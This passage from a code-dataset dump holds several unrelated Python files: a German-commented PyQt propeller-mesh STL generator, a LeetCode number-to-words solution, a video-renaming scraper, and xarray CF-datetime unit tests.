math.sin(math.radians(p))*(Achse2/2)+yO ,-3+zO]) \r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0-f+(18*2),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,1-f+(18*2),0-f+(18*2)])\r\n f += 1\r\n \r\n \r\n \r\n \r\n # Unteren und Oberen Halbkreis Erstellen \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubTop)[f[j],:]\r\n \r\n Eckfolge = [] #Eckfolge für Unteren Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,0-f+(18*2)])\r\n else:\r\n Eckfolge.append([0-f+(18*2),1-f+(18*2),0+f])\r\n f += 1\r\n \r\n Hub.append(Hubmesh.data)\r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubBottom)[f[j],:] \r\n Hub.append(Hubmesh.data)\r\n \r\n \r\n # Koordinaten liste aus der Ober und Unterhälfte für die Hülle\r\n HubTop.reverse() #HubTop wird umgedreht eingesetzt\r\n \r\n HubComplete = HubBottom + HubTop\r\n \r\n \r\n \r\n #Eckfolge für die Hülle\r\n Eckfolge = []\r\n f = 0 \r\n for i in range(10):\r\n if i % 2 == 0:\r\n Eckfolge.append([2-f+(18*4),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,3-f+(18*4),2-f+(18*4)])\r\n f += 1\r\n # Zum Schließen der Form \r\n Eckfolge.append([0,38,75])#\r\n Eckfolge.append([0,37,38])#\r\n Eckfolge.append([56,19,18])#\r\n Eckfolge.append([18,57,56])#\r\n \r\n # Körper wird Erstellt \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubComplete)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n \r\n \r\n #////////HubRim\\\\\\\\\\\\\\\\\\\r\n \r\n Eckfolge = []\r\n f = 0 \r\n for i in range(14*2-2): #Eckfolge für den Oberen Rand\r\n if i % 2 == 0:\r\n Eckfolge.append([1+f+(15),1+f,0+f])\r\n else:\r\n Eckfolge.append([1+f+(14),2+f+(14),0+f])\r\n f += 1\r\n \r\n #Rand wird dem Mesh hinzugefügt\r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubRimTop)[f[j],:] \r\n Hub.append(Hubmesh.data)\r\n \r\n Eckfolge = []\r\n f = 0 \r\n for i in range(14*2-2): #Eckfolge für den Unteren Rand\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,1+f+(15)])\r\n else:\r\n Eckfolge.append([0+f,2+f+(14),1+f+(14)])\r\n f += 1\r\n \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubRimBottom)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n \r\n #/////// Verbindungs Stück \\\\\\\\\\\\\\\\ \r\n \r\n Kord.reverse()\r\n for i in range(18*2): #Koordinaten für einen Kreis zum verbinden mit dem Hub\r\n i -= 18\r\n i = i*10\r\n Kord.append( [Achse2/2+xO, (math.cos(math.radians(i))*6)+yO, (math.sin(math.radians(i))*3)+zO])\r\n \r\n \r\n \r\n Eckfolge = []\r\n f = 0 \r\n for i in range(18*4): #Für den Kreis mit dem Hub\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,2+f+(18*2)])\r\n else:\r\n Eckfolge.append([0+f,2+f+(18*2),1+f+(18*2)])\r\n f += 1\r\n Eckfolge.append([36,37,38])\r\n Eckfolge.append([36,38,73])\r\n \r\n # Körper wird Erstellt \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n #Kreis an die Airfoil besfestigen\r\n \r\n \r\n Kord = []\r\n for i in range(18*2): #Koordinaten für einen Kreis zum verbinden mit dem Hub\r\n i -= 18\r\n i = i*10\r\n Kord.append( [Achse2/2+xO, (math.cos(math.radians(i))*6)+yO, (math.sin(math.radians(i))*3)+zO])\r\n Kord.reverse() \r\n Kord = Kord+KordC\r\n \r\n \r\n Eckfolge = []\r\n f = 0\r\n g = 0\r\n h = 0\r\n for i in range(158-1):\r\n if h <= 3.38888:\r\n Eckfolge.append([36+f,37+f,0+g])\r\n f += 1\r\n h += 0.9\r\n \r\n else:\r\n Eckfolge.append([1+g,0+g,36+f])\r\n \r\n g += 1\r\n h -= 3\r\n if g == 36:\r\n g = 0\r\n Eckfolge.append([0, 35, 157])\r\n \r\n \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n #//////////////Propeller Ring\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\n \r\n \r\n RingTopIn = []\r\n RingBottomIn = []\r\n Achse3 = Achse + InnerRingBreite*2 + Ringabstand\r\n \r\n \r\n for i in range(36): #Koordinaten Liste für Oberen und Unteren kreis\r\n i -= 9\r\n i = i*10\r\n \r\n RingTopIn.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,2])\r\n \r\n RingBottomIn.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,0])\r\n \r\n \r\n Kord = RingTopIn + RingBottomIn\r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen und Unteren Kreis\r\n f = 0 \r\n for i in range(36*2-1):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,0+f+(36)])\r\n else:\r\n Eckfolge.append([0+f+(36-1),0+f,1+f+(36-1)])\r\n f += 1\r\n \r\n Eckfolge.append([35,71,70])\r\n \r\n \r\n \r\n \r\n Ring = []\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data) \r\n \r\n \r\n \r\n \r\n \r\n RingTop = []\r\n RingBottom = []\r\n Achse3 = Achse + InnerRingBreite*2 + Ringabstand + RingbreiteAussen*2\r\n \r\n \r\n for i in range(36): #Koordinaten Liste für Oberen und Unteren kreis\r\n i -= 9\r\n i = i*10\r\n \r\n RingTop.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,2])\r\n \r\n RingBottom.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,0])\r\n \r\n \r\n \r\n \r\n \r\n Kord = RingTop + RingTopIn\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data) \r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen und Unteren Kreis\r\n f = 0 \r\n for i in range(36*2-1):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f+(36),1+f,0+f])\r\n else:\r\n Eckfolge.append([1+f+(36-1),0+f,0+f+(36-1)])\r\n f += 1\r\n \r\n Eckfolge.append([70,71,35])\r\n \r\n Kord = RingTop + RingBottom\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data)\r\n \r\n \r\n Kord = RingBottom + RingBottomIn\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data) \r\n \r\n \r\n \r\n \r\n Ring = mesh.Mesh(np.concatenate(Ring))\r\n self.Ring = Ring\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n #///////Export\\\\\\\\\\\\\r\n \r\n \r\n Propeller = Propeller+Hub \r\n \r\n \r\n Propeller = mesh.Mesh(np.concatenate(Propeller))\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n #3D Render anzeigen\r\n self.bild = vpl.QtFigure(\"bild\")\r\n self.gridLayout.addWidget(self.bild, 0, 0, 1, 1)\r\n \r\n \r\n vpl.mesh_plot(Propeller)\r\n vpl.mesh_plot(Ring)\r\n \r\n \r\n\r\n \r\n self.bild.update() \r\n \r\n self.Propeller = Propeller\r\n \r\n \r\n self.Table()\r\n \r\n \r\n \r\n def Table(self):\r\n #Erstellung der Tabelle für die Geschwindigkeit und Winkel werte\r\n self.table.setRowCount(len(self.UI))\r\n self.table.setColumnCount(len(self.UI[0]))\r\n self.table.setHorizontalHeaderLabels([\"Profil v in m/s\", \"Profil Winkel\"])\r\n for i,row in enumerate(self.UI):\r\n for j,val in enumerate(row):\r\n self.table.setItem(i,j,QtWidgets.QTableWidgetItem(str(val)))\r\n \r\n self.table.setEditTriggers(QtWidgets.QTableWidget.NoEditTriggers)\r\n \r\n \r\n\r\n def Export(self):\r\n \r\n \r\n \r\n #Create directory\r\n dirName = self.path +'\\Optiprop'\r\n \r\n #Wenn Optiprop Ordener noch nicht vorhanden ist wird ein neuer erstellt \r\n if not os.path.exists(dirName):\r\n os.mkdir(dirName)\r\n \r\n \r\n #Propeller Rotieren um die Richtige Orientierung zu haben zum Drucken\r\n self.Propeller.rotate([0.5, 0.0, 0.0], math.radians(-90))\r\n Propname = \"\\PropellerL\" + str(int(self.L)) + \"Kv\" + str(int(self.Kv)) + \"Lg\" + str(int(self.LGeschwindigkeit)) + \"D\" +str(self.Achse-0.8) + \".stl\"\r\n \r\n #Propeller Export\r\n self.Propeller.save(dirName + Propname) \r\n #Confirmation\r\n self.labelX.setText(\"Export Complete\")\r\n #Ring Export\r\n self.Ring.save(dirName + \"\\Ring_D_\"+str(self.Achse-0.8)+\"mm.stl\")\r\n \r\n \r\n \r\n \r\n \r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n ","sub_path":"Optiprop Stadalone v0.4.py","file_name":"Optiprop Stadalone v0.4.py","file_ext":"py","file_size_in_byte":45853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"601737234","text":"from typing import List\nimport re\n\n\nclass Solution:\n def __init__(self):\n self.cardinal = {\"0\": \"\", \"1\": \"One\", \"2\": \"Two\", \"3\": \"Three\", \"4\": \"Four\", \"5\": \"Five\", \"6\": \"Six\",\n \"7\": \"Seven\", \"8\": \"Eight\", \"9\": \"Nine\"}\n\n self.mults = {1: \"\", 2: \"Thousand\", 3: \"Million\", 4: \"Billion\"}\n self.teens = {\"10\": \"Ten\", \"11\": \"Eleven\", \"12\": \"Twelve\", \"13\": \"Thirteen\",\n \"14\": \"Fourteen\", \"15\": \"Fifteen\", \"16\": \"Sixteen\", \"17\": \"Seventeen\",\n \"18\": \"Eighteen\", \"19\": \"Nineteen\"}\n self.ees = {\"1\": \"Teen\", \"2\": \"Twenty\", \"3\": \"Thirty\", \"4\": \"Forty\", \"5\": \"Fifty\", \"6\": \"Sixty\",\n \"7\": \"Seventy\", \"8\": \"Eighty\", \"9\": \"Ninety\"}\n\n def Triplets(self, num: int) -> List:\n n = str(num)\n t = list()\n while n != '':\n t.append(n[-3:])\n n = n[0:-3]\n t.reverse()\n return t\n\n def SayIt(self, t: str, m: int):\n # print(\"Doing: {}\".format(t))\n t = t.lstrip(\"0\")\n s = \"\"\n if t == \"\":\n # print(\"Zero: {}\".format(self.mults[m]))\n return self.mults[m]\n if len(t) == 3:\n s += self.cardinal[t[0]] + \" Hundred \"\n t = t[1:]\n if t == \"00\":\n s += \" \" + self.mults[m] + \" \"\n return \"{}\".format(s)\n if len(t) == 2:\n if 10 < int(t) < 20:\n s += self.teens[t]\n elif int(t) > 10:\n s += self.ees[t[0]] + \" \" + self.cardinal[t[1]]\n elif int(t) == 10:\n s += \"Ten\"\n elif int(t) < 10:\n s += self.cardinal[t[1]]\n s += \" \" + self.mults[m]\n else:\n s += self.cardinal[t]\n s += \" \" + self.mults[m]\n if m != 1:\n s += \" \"\n return \"{}\".format(s)\n\n def numberToWords(self, num: int) -> str:\n a = \"\"\n if num == 0:\n return \"Zero\"\n trips = self.Triplets(num)\n m = len(trips)\n for t in trips:\n a += self.SayIt(t, m)\n m -= 1\n a = re.sub(' +', ' ', a)\n a = re.sub('Million Thousand', 'Million ', a)\n a = re.sub('Billion Million', 'Billion ', a)\n a = re.sub('Billion Thousand', 'Billion ', a)\n return a.strip()\n","sub_path":"leet273/words/words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"295855684","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\n\n\nurl = 'http://www.maiziedu.com/course/337/'\ndir_path = 'E:\\迅雷下载\\麦子学院-Redis入门'\n\ndef mp4_title(url):\n html = requests.get(url)\n Soup = BeautifulSoup(html.content,'html.parser')\n all_li = Soup.find('ul',class_='lesson-lists').findAll('li')\n titles = []\n n = 0\n for i in all_li:\n n +=1\n titles.append(i.find('span',class_='fl').text)\n return titles\n\ndef change_files_name(dir_path,url):\n os.chdir(dir_path) # 移动到该目录下\n titles = mp4_title(url)\n n = 0\n for title in titles:\n n += 1\n os.rename('redisrm'+str(n)+'.mp4',title+'.mp4')\nchange_files_name(dir_path,url)\n","sub_path":"麦子学院-Redis入门-视频名称批量修改.py","file_name":"麦子学院-Redis入门-视频名称批量修改.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"484904677","text":"import contextlib\nimport numpy as np\nimport pandas as pd\nimport warnings\n\nfrom xarray import conventions, Variable, Dataset, open_dataset\nfrom xarray.core import utils, indexing\nfrom . import TestCase, requires_netCDF4, unittest\nfrom .test_backends import CFEncodedDataTest\nfrom xarray.core.pycompat import iteritems\nfrom xarray.backends.memory import InMemoryDataStore\nfrom xarray.backends.common import WritableCFDataStore\nfrom xarray.conventions import decode_cf\n\n\nclass TestMaskedAndScaledArray(TestCase):\n def test(self):\n x = conventions.MaskedAndScaledArray(np.arange(3), fill_value=0)\n self.assertEqual(x.dtype, np.dtype('float'))\n self.assertEqual(x.shape, (3,))\n self.assertEqual(x.size, 3)\n self.assertEqual(x.ndim, 1)\n self.assertEqual(len(x), 3)\n self.assertArrayEqual([np.nan, 1, 2], x)\n\n x = conventions.MaskedAndScaledArray(np.arange(3), add_offset=1)\n self.assertArrayEqual(np.arange(3) + 1, x)\n\n x = conventions.MaskedAndScaledArray(np.arange(3), scale_factor=2)\n self.assertArrayEqual(2 * np.arange(3), x)\n\n x = conventions.MaskedAndScaledArray(np.array([-99, -1, 0, 1, 2]),\n -99, 0.01, 1)\n expected = np.array([np.nan, 0.99, 1, 1.01, 1.02])\n self.assertArrayEqual(expected, x)\n\n def test_0d(self):\n x = conventions.MaskedAndScaledArray(np.array(0), fill_value=0)\n self.assertTrue(np.isnan(x))\n self.assertTrue(np.isnan(x[...]))\n\n x = conventions.MaskedAndScaledArray(np.array(0), fill_value=10)\n self.assertEqual(0, x[...])\n\n def test_multiple_fill_value(self):\n x = conventions.MaskedAndScaledArray(\n np.arange(4), fill_value=np.array([0, 1]))\n self.assertArrayEqual([np.nan, np.nan, 2, 3], x)\n\n x = conventions.MaskedAndScaledArray(\n np.array(0), fill_value=np.array([0, 1]))\n self.assertTrue(np.isnan(x))\n self.assertTrue(np.isnan(x[...]))\n\n\nclass TestCharToStringArray(TestCase):\n def test_wrapper_class(self):\n array = np.array(list('abc'), dtype='S')\n actual = conventions.CharToStringArray(array)\n expected = np.array('abc', dtype='S')\n self.assertEqual(actual.dtype, expected.dtype)\n self.assertEqual(actual.shape, expected.shape)\n self.assertEqual(actual.size, expected.size)\n self.assertEqual(actual.ndim, expected.ndim)\n with self.assertRaises(TypeError):\n len(actual)\n self.assertArrayEqual(expected, actual)\n with self.assertRaises(IndexError):\n actual[:2]\n self.assertEqual(str(actual), 'abc')\n\n array = np.array([list('abc'), list('cdf')], dtype='S')\n actual = conventions.CharToStringArray(array)\n expected = np.array(['abc', 'cdf'], dtype='S')\n self.assertEqual(actual.dtype, expected.dtype)\n self.assertEqual(actual.shape, expected.shape)\n self.assertEqual(actual.size, expected.size)\n self.assertEqual(actual.ndim, expected.ndim)\n self.assertEqual(len(actual), len(expected))\n self.assertArrayEqual(expected, actual)\n self.assertArrayEqual(expected[:1], actual[:1])\n with self.assertRaises(IndexError):\n actual[:, :2]\n\n def test_char_to_string(self):\n array = np.array([['a', 'b', 'c'], ['d', 'e', 'f']])\n expected = np.array(['abc', 'def'])\n actual = conventions.char_to_string(array)\n self.assertArrayEqual(actual, expected)\n\n expected = np.array(['ad', 'be', 'cf'])\n actual = conventions.char_to_string(array.T) # non-contiguous\n self.assertArrayEqual(actual, expected)\n\n def test_string_to_char(self):\n array = np.array([['ab', 'cd'], ['ef', 'gh']])\n expected = np.array([[['a', 'b'], ['c', 'd']],\n [['e', 'f'], ['g', 'h']]])\n actual = conventions.string_to_char(array)\n self.assertArrayEqual(actual, expected)\n\n expected = np.array([[['a', 'b'], ['e', 'f']],\n [['c', 'd'], ['g', 'h']]])\n actual = conventions.string_to_char(array.T)\n self.assertArrayEqual(actual, expected)\n\n\nclass TestBoolTypeArray(TestCase):\n def test_booltype_array(self):\n x = np.array([1, 0, 1, 1, 0], dtype='i1')\n bx = conventions.BoolTypeArray(x)\n self.assertEqual(bx.dtype, np.bool)\n self.assertArrayEqual(bx, np.array([True, False, True, True, False],\n dtype=np.bool))\n\n\n@np.vectorize\ndef _ensure_naive_tz(dt):\n if hasattr(dt, 'tzinfo'):\n return dt.replace(tzinfo=None)\n else:\n return dt\n\n\nclass TestDatetime(TestCase):\n @requires_netCDF4\n def test_cf_datetime(self):\n import netCDF4 as nc4\n for num_dates, units in [\n (np.arange(10), 'days since 2000-01-01'),\n (np.arange(10).reshape(2, 5), 'days since 2000-01-01'),\n (12300 + np.arange(5), 'hours since 1680-01-01 00:00:00'),\n # here we add a couple minor formatting errors to test\n # the robustness of the parsing algorithm.\n (12300 + np.arange(5), 'hour since 1680-01-01 00:00:00'),\n (12300 + np.arange(5), u'Hour since 1680-01-01 00:00:00'),\n (12300 + np.arange(5), ' Hour since 1680-01-01 00:00:00 '),\n (10, 'days since 2000-01-01'),\n ([10], 'daYs since 2000-01-01'),\n ([[10]], 'days since 2000-01-01'),\n ([10, 10], 'days since 2000-01-01'),\n (np.array(10), 'days since 2000-01-01'),\n (0, 'days since 1000-01-01'),\n ([0], 'days since 1000-01-01'),\n ([[0]], 'days since 1000-01-01'),\n (np.arange(2), 'days since 1000-01-01'),\n (np.arange(0, 100000, 20000), 'days since 1900-01-01'),\n (17093352.0, 'hours since 1-1-1 00:00:0.0'),\n ([0.5, 1.5], 'hours since 1900-01-01T00:00:00'),\n (0, 'milliseconds since 2000-01-01T00:00:00'),\n (0, 'microseconds since 2000-01-01T00:00:00'),\n ]:\n for calendar in ['standard', 'gregorian', 'proleptic_gregorian']:\n expected = _ensure_naive_tz(nc4.num2date(num_dates, units, calendar))\n print(num_dates, units, calendar)\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore',\n 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(num_dates, units,\n calendar)\n if (isinstance(actual, np.ndarray) and\n np.issubdtype(actual.dtype, np.datetime64)):\n # self.assertEqual(actual.dtype.kind, 'M')\n # For some reason, numpy 1.8 does not compare ns precision\n # datetime64 arrays as equal to arrays of datetime objects,\n # but it works for us precision. Thus, convert to us\n # precision for the actual array equal comparison...\n actual_cmp = actual.astype('M8[us]')\n else:\n actual_cmp = actual\n self.assertArrayEqual(expected, actual_cmp)\n encoded, _, _ = conventions.encode_cf_datetime(actual, units,\n calendar)\n if '1-1-1' not in units:\n # pandas parses this date very strangely, so the original\n # units/encoding cannot be preserved in this case:\n # (Pdb) pd.to_datetime('1-1-1 00:00:0.0')\n # Timestamp('2001-01-01 00:00:00')\n self.assertArrayEqual(num_dates, np.around(encoded, 1))\n if (hasattr(num_dates, 'ndim') and num_dates.ndim == 1 and\n '1000' not in units):\n # verify that wrapping with a pandas.Index works\n # note that it *does not* currently work to even put\n # non-datetime64 compatible dates into a pandas.Index :(\n encoded, _, _ = conventions.encode_cf_datetime(\n pd.Index(actual), units, calendar)\n self.assertArrayEqual(num_dates, np.around(encoded, 1))\n\n @requires_netCDF4\n def test_decode_cf_datetime_overflow(self):\n # checks for \n # https://github.com/pydata/pandas/issues/14068\n # https://github.com/pydata/xarray/issues/975\n\n from datetime import datetime \n units = 'days since 2000-01-01 00:00:00'\n\n # date after 2262 and before 1678\n days = (-117608, 95795)\n expected = (datetime(1677, 12, 31), datetime(2262, 4, 12))\n\n for i, day in enumerate(days):\n result = conventions.decode_cf_datetime(day, units)\n self.assertEqual(result, expected[i])\n\n @requires_netCDF4\n def test_decode_cf_datetime_transition_to_invalid(self):\n # manually create dataset with not-decoded date\n from datetime import datetime\n ds = Dataset(coords={'time' : [0, 266 * 365]})\n units = 'days since 2000-01-01 00:00:00'\n ds.time.attrs = dict(units=units)\n ds_decoded = conventions.decode_cf(ds)\n\n expected = [datetime(2000, 1, 1, 0, 0),\n datetime(2265, 10, 28, 0, 0)]\n\n self.assertArrayEqual(ds_decoded.time.values, expected)\n\n def test_decoded_cf_datetime_array(self):\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01', 'standard')\n expected = pd.date_range('1900-01-01', periods=3).values\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual, expected)\n\n # default calendar\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01')\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual, expected)\n\n def test_slice_decoded_cf_datetime_array(self):\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01', 'standard')\n expected = pd.date_range('1900-01-01', periods=3).values\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual[slice(0, 2)], expected[slice(0, 2)])\n\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01', 'standard')\n expected = pd.date_range('1900-01-01', periods=3).values\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual[[0, 2]], expected[[0, 2]])\n\n def test_decode_cf_datetime_non_standard_units(self):\n expected = pd.date_range(periods=100, start='1970-01-01', freq='h')\n # netCDFs from madis.noaa.gov use this format for their time units\n # they cannot be parsed by netcdftime, but pd.Timestamp works\n units = 'hours since 1-1-1970'\n actual = conventions.decode_cf_datetime(np.arange(100), units)\n self.assertArrayEqual(actual, expected)\n\n def test_decode_cf_with_conflicting_fill_missing_value(self):\n var = Variable(['t'], np.arange(10),\n {'units': 'foobar',\n 'missing_value': 0,\n '_FillValue': 1})\n self.assertRaisesRegexp(ValueError, \"_FillValue and missing_value\",\n lambda: conventions.decode_cf_variable(var))\n\n @requires_netCDF4\n def test_decode_cf_datetime_non_iso_strings(self):\n # datetime strings that are _almost_ ISO compliant but not quite,\n # but which netCDF4.num2date can still parse correctly\n expected = pd.date_range(periods=100, start='2000-01-01', freq='h')\n cases = [(np.arange(100), 'hours since 2000-01-01 0'),\n (np.arange(100), 'hours since 2000-1-1 0'),\n (np.arange(100), 'hours since 2000-01-01 0:00')]\n for num_dates, units in cases:\n actual = conventions.decode_cf_datetime(num_dates, units)\n self.assertArrayEqual(actual, expected)\n\n @requires_netCDF4\n def test_decode_non_standard_calendar(self):\n import netCDF4 as nc4\n\n for calendar in ['noleap', '365_day', '360_day', 'julian', 'all_leap',\n '366_day']:\n units = 'days since 0001-01-01'\n times = pd.date_range('2001-04-01-00', end='2001-04-30-23',\n freq='H')\n noleap_time = nc4.date2num(times.to_pydatetime(), units,\n calendar=calendar)\n expected = times.values\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(noleap_time, units,\n calendar=calendar)\n self.assertEqual(actual.dtype, np.dtype('M8[ns]'))\n abs_diff = abs(actual - expected)\n # once we no longer support versions of netCDF4 older than 1.1.5,\n # we could do this check with near microsecond accuracy:\n # https://github.com/Unidata/netcdf4-python/issues/355\n self.assertTrue((abs_diff <= np.timedelta64(1, 's')).all())\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_single_element(self):\n units = 'days since 0001-01-01'\n for calendar in ['noleap', '365_day', '360_day', 'julian', 'all_leap',\n '366_day']:\n for num_time in [735368, [735368], [[735368]]]:\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore',\n 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(num_time, units,\n calendar=calendar)\n self.assertEqual(actual.dtype, np.dtype('M8[ns]'))\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_single_element_fallback(self):\n import netCDF4 as nc4\n\n units = 'days since 0001-01-01'\n dt = nc4.netcdftime.datetime(2001, 2, 29)\n for calendar in ['360_day', 'all_leap', '366_day']:\n num_time = nc4.date2num(dt, units, calendar)\n with self.assertWarns('Unable to decode time axis'):\n actual = conventions.decode_cf_datetime(num_time, units,\n calendar=calendar)\n expected = np.asarray(nc4.num2date(num_time, units, calendar))\n print(num_time, calendar, actual, expected)\n self.assertEqual(actual.dtype, np.dtype('O'))\n self.assertEqual(expected, actual)\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_multidim_time(self):\n import netCDF4 as nc4\n\n calendar = 'noleap'\n units = 'days since 0001-01-01'\n times1 = pd.date_range('2001-04-01', end='2001-04-05', freq='D')\n times2 = pd.date_range('2001-05-01', end='2001-05-05', freq='D')\n noleap_time1 = nc4.date2num(times1.to_pydatetime(), units,\n calendar=calendar)\n noleap_time2 = nc4.date2num(times2.to_pydatetime(), units,\n calendar=calendar)\n mdim_time = np.empty((len(noleap_time1), 2), )\n mdim_time[:, 0] = noleap_time1\n mdim_time[:, 1] = noleap_time2\n\n expected1 = times1.values\n expected2 = times2.values\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(mdim_time, units,\n calendar=calendar)\n self.assertEqual(actual.dtype, np.dtype('M8[ns]'))\n self.assertArrayEqual(actual[:, 0], expected1)\n self.assertArrayEqual(actual[:, 1], expected2)\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_fallback(self):\n import netCDF4 as nc4\n # ensure leap year doesn't matter\n for year in [2010, 2011, 2012, 2013, 2014]:\n for calendar in ['360_day', '366_day', 'all_leap']:\n calendar = '360_day'\n units = 'days since {0}-01-01'.format(year)\n num_times = np.arange(100)\n expected = nc4.num2date(num_times, units, calendar)\n\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter('always')\n actual = conventions.decode_cf_datetime(num_times, units,\n calendar=calendar)\n self.assertEqual(len(w), 1)\n self.assertIn('Unable to decode time axis',\n str(w[0].message))\n\n self.assertEqual(actual.dtype, np.dtype('O'))\n self.assertArrayEqual(actual, expected)\n\n @requires_netCDF4\n def test_cf_datetime_nan(self):\n for num_dates, units, expected_list in [\n ([np.nan], 'days since 2000-01-01', ['NaT']),\n ([np.nan, 0], 'days since 2000-01-01',\n ['NaT', '2000-01-01T00:00:00Z']),\n ([np.nan, 0, 1], 'days since 2000-01-01',\n ['NaT', '2000-01-01T00:00:00Z', '2000-01-02T00:00:00Z']),\n ]:\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', 'All-NaN')\n actual = conventions.decode_cf_datetime(num_dates, units)\n expected = np.array(expected_list, dtype='datetime64[ns]')\n 